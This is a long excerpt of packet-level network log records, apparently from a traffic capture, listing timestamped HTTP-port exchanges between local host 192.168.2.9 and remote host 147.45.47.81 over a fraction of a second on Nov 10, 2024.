                                                                                                                                                                                Nov 10, 2024 09:18:28.211472034 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.227596045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227639914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227652073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227673054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227686882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227699995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227711916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.227714062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227727890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227756023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227761030 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.227768898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227781057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.227797985 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.227817059 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.228115082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228132963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228144884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228156090 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228182077 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.228183031 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228189945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.228199005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228213072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228224993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.228231907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.228266954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.275382996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.275394917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.275460958 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.283243895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.283256054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.283274889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.283284903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.283305883 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.283328056 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.283993959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284035921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284053087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284065008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284091949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284099102 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284105062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284125090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284126043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284138918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284169912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284171104 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284200907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284212112 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284229040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284240007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284251928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284266949 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284296989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284320116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284331083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284337997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284383059 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284389973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284406900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284430981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284444094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284456015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284470081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284478903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284493923 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284513950 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284522057 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284533024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284573078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284578085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284590006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284631968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284642935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284657001 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284672022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284686089 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284712076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284725904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284739017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284759045 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284765959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284770966 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284782887 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284820080 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284867048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284878016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284892082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284909964 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284914970 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284921885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.284965038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.284976959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285001040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285012007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285013914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285048962 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285079956 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285092115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285145998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285146952 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285211086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285229921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285242081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285259008 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285269022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285275936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285286903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285288095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285311937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285336971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285345078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285347939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285423040 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285430908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285435915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285448074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285465956 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285510063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285523891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285536051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285547018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285573006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285590887 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285608053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285628080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285638094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285645008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285649061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285681963 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285702944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285715103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285732031 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285743952 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285744905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285774946 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285775900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285823107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285834074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285851002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285859108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285866022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285883904 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285895109 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285897970 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.285938978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285950899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285963058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285975933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.285991907 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.286012888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.326952934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.326965094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.326977015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.326987982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.327023029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.327056885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343218088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343230963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343242884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343319893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343333006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343337059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343355894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343362093 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343374014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343388081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343394995 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343400002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343411922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343424082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343430042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343444109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343467951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343600035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343638897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343642950 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343720913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343733072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343744993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343759060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343765020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343769073 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343791962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343796968 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343805075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.343830109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.343842983 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.382574081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.391062021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.391079903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.391143084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.399127007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399142027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399197102 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.399770975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399804115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399822950 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399847984 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.399863005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399879932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399894953 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399905920 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.399935007 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.399936914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399951935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399972916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.399996042 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400011063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400012016 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400031090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400059938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400074959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400094986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400099993 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400110006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400140047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400145054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400157928 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400185108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400264978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400289059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400296926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400305986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400321007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400342941 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400343895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400382996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400398016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400418997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400434017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400449991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400465965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400468111 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400490046 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400490999 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400618076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400633097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400649071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400664091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400665998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400686979 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400701046 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400715113 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400739908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400753975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400775909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400778055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400796890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400813103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400821924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400830984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400844097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400859118 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400882006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400911093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400928020 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400948048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400966883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.400978088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.400981903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401005030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401020050 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401045084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401202917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401218891 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401230097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401256084 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401261091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401278019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401292086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401302099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401310921 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401326895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401329994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401343107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401357889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401370049 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401416063 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401448965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401472092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401488066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401501894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401518106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401532888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401555061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401556969 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401578903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401593924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:28.401623011 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401631117 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:28.401635885 CET8049833147.45.47.81192.168.2.9
